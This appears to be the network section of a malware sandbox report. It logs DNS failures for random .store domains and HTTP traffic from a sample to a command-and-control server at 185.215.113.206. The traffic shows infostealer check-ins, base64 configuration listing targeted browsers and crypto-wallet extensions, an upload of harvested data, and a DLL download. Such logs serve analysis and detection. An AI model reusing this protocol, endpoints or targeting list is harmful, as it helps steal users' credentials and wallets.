Nov 11, 2024 10:34:26.080672979 CET	1.1.1.1	192.168.2.5	0xfa46	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.104736090 CET	1.1.1.1	192.168.2.5	0xdf47	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.923093081 CET	1.1.1.1	192.168.2.5	0x294e	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.951375008 CET	1.1.1.1	192.168.2.5	0xdc01	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.976720095 CET	1.1.1.1	192.168.2.5	0xed1c	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.999716043 CET	1.1.1.1	192.168.2.5	0x6c67	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:50.023974895 CET	1.1.1.1	192.168.2.5	0xce0a	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:50.049196959 CET	1.1.1.1	192.168.2.5	0xbcdb	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.206	80	984	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:33:01.325256109 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:33:01.963808060 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:01.980463982 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 2d 2d 0d 0a Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="build"mars------JJKEBGHJKFIDGCAAFCAF--
Nov 11, 2024 10:33:02.195960045 CET	407	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 7a 51 7a 4d 57 55 31 4d 6a 41 79 4e 32 45 7a 4e 47 4a 6d 5a 54 49 77 4d 54 5a 6c 4e 44 56 68 4e 6d 4d 78 59 57 45 35 4d 54 67 35 4f 44 55 7a 4d 47 51 79 5a 54 49 77 4e 7a 59 34 4e 7a 64 6c 5a 47 52 69 4d 32 56 6c 4d 54 55 31 5a 6d 4e 68 4e 54 6b 79 4d 32 4a 6d 4f 47 46 69 4e 44 4a 6a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MzQzMWU1MjAyN2EzNGJmZTIwMTZlNDVhNmMxYWE5MTg5ODUzMGQyZTIwNzY4NzdlZGRiM2VlMTU1ZmNhNTkyM2JmOGFiNDJjfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 11, 2024 10:33:02.197206020 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"browsers------HIDAKFIJJKJJJKEBKJEH--
Nov 11, 2024 10:33:02.399665117 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 11, 2024 10:33:02.399683952 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 11, 2024 10:33:02.401012897 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="message"plugins------JEGHDAFIDGDAAKEBFHDA--
Nov 11, 2024 10:33:02.604213953 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 11, 2024 10:33:02.604229927 CET	212	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8
Nov 11, 2024 10:33:02.604262114 CET	1236	IN	Data Raw: 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 Data Ascii: ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZ
Nov 11, 2024 10:33:02.604274988 CET	1236	IN	Data Raw: 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d Data Ascii: dHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGp
Nov 11, 2024 10:33:02.608952045 CET	1236	IN	Data Raw: 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 Data Ascii: bmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGh
Nov 11, 2024 10:33:02.608988047 CET	636	IN	Data Raw: 64 57 78 30 66 47 6c 6e 61 33 42 6a 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 Data Ascii: dWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWp
Nov 11, 2024 10:33:02.609000921 CET	1236	IN	Data Raw: 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 Data Ascii: bnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1
Nov 11, 2024 10:33:02.609014988 CET	316	IN	Data Raw: 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d Data Ascii: bWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN
Nov 11, 2024 10:33:02.610485077 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGDBAFHJJDAKEBGCFCB Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="message"fplugins------AEGDBAFHJJDAKEBGCFCB--
Nov 11, 2024 10:33:02.811916113 CET	335	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Nov 11, 2024 10:33:02.828975916 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAA Host: 185.215.113.206 Content-Length: 7235 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:33:02.829006910 CET	7235	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Nov 11, 2024 10:33:03.591995955 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:04.071623087 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 11, 2024 10:33:04.271266937 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:04 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls 